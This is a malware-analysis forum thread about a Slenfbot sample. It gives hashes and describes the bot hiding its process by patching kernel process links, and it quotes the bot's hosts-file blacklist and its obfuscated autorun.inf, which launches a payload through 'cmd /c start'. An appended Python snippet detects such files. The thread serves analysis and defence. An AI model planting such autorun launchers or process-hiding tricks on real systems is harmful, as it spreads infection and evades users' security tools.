A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #15610  by Flamef
 Sun Sep 16, 2012 1:26 pm
A while ago, I wrote some sort of article regarding League of Legends themed scams; it's published at MalwareDisasters and can be read here:
http://malwaredisasters.blogspot.gr/201 ... ttack.html
Funny how a kid can make his own phishing tool and start spreading havoc :D
https://www.virustotal.com/file/77186a0 ... /analysis/
Thanks Xylitol for the sample.
 #19499  by thisisu
 Fri May 31, 2013 12:45 am
I think this belongs here, sorry if it should be in its own topic.

https://www.virustotal.com/en/file/d761 ... 369960479/

MD5: ff273462480a65f7601809af5a0378d1

http://www.microsoft.com/security/porta ... 2fSlenfbot

Was on the same machine that also had Palevo/Lime
Attachments: Slenfbot.jpg (screenshot); sample archive, pass: infected
 #19506  by EP_X0FF
 Fri May 31, 2013 4:37 am
thisisu wrote: I think this belongs here, sorry if it should be in its own topic.

https://www.virustotal.com/en/file/d761 ... 369960479/

MD5: ff273462480a65f7601809af5a0378d1

http://www.microsoft.com/security/porta ... 2fSlenfbot

Was on the same machine that also had Palevo/Lime
Well, it is an old C++ autorunner with an AV blacklist and hosts data file modification. However, it has a small interesting feature (only works on XP and 2003 RTM). It hides its own process from the process list by patching EPROCESS ActiveProcessLinks with NtSystemDebugControl calls.

Image

In the attachment: the decrypted bot.

https://www.virustotal.com/en/file/adb7 ... /analysis/

WWW blacklist
Code:
127.0.0.1	%s
Security software blacklist
Autorunner
Code:
\autorun.inf    
[aUTOrUN] 
useautoplay=1 
;?ВX?лтсLLЭмIL?Н?Г?   
sHELL\\explore\\\command=cmd /c start "" "CACHE-19204730\comd.sys"    
;ЭмIL?Н?Г??ВX?лтсLL   
sHELL\\open\\\command=cmd /c start "" "CACHE-19204730\comd.sys"   
;OOмБГ?D  
action=Open folder to view files using Windows Explorer   
н?ИГТv    
icon=%SystemRoot%\system32\SHELL32.dll,4  
;??Cd 
open=cmd /c start "" "CACHE-19204730\comd.sys"    
:nop
;M?Ц???В    
Attachments: decrypted bot archive, pass: infected
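The autorun.inf quoted above mixes letter case, doubled backslashes and junk comment lines so that naive string signatures miss it, while the INI parser still sees plain shell\open\command keys. The following is an added example (not code from the thread or from the sample) of a normalising parser that recovers the commands such a file would hand to the shell; the sample text is constructed after the quoted one, and the assumption that runs of backslashes collapse to one path separator is mine.

```python
import re

# Constructed sample modelled on the obfuscated autorun.inf quoted in the thread:
# mixed-case section and keys, junk comment lines, runs of backslashes, a bare junk line.
SAMPLE_AUTORUN = r"""[aUTOrUN]
useautoplay=1
;?X?junkLL
sHELL\\explore\\\command=cmd /c start "" "CACHE-19204730\comd.sys"
sHELL\\open\\\command=cmd /c start "" "CACHE-19204730\comd.sys"
action=Open folder to view files using Windows Explorer
?junkTv
icon=%SystemRoot%\system32\SHELL32.dll,4
open=cmd /c start "" "CACHE-19204730\comd.sys"
:nop
"""

# Keys whose values end up executed when the device is opened or autoplayed.
EXEC_KEYS = ("open", "shellexecute", "shell\\open\\command", "shell\\explore\\command")


def parse_autorun(text):
    """Return {section: {key: value}} with names lowercased, ';' comments dropped,
    key-less junk lines ignored and backslash runs in key names collapsed (assumption)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):          # blank or INI comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:       # junk such as ':nop' or '?junkTv'
            continue
        key, _, value = line.partition("=")
        key = re.sub(r"\\+", r"\\", key.strip().lower())
        sections[current][key] = value.strip()
    return sections


def launch_targets(text):
    """Map each executing key present in [autorun] to the command it would run."""
    autorun = parse_autorun(text).get("autorun", {})
    return {k: autorun[k] for k in EXEC_KEYS if k in autorun}


def is_suspicious(text):
    """Flag the pattern seen here: a decoy 'Open folder' action plus Explorer icon,
    while every open/explore path actually launches a payload through cmd /c start."""
    autorun = parse_autorun(text).get("autorun", {})
    targets = launch_targets(text)
    decoy = "open folder" in autorun.get("action", "").lower()
    return bool(targets) and decoy and all("cmd /c start" in v.lower() for v in targets.values())
```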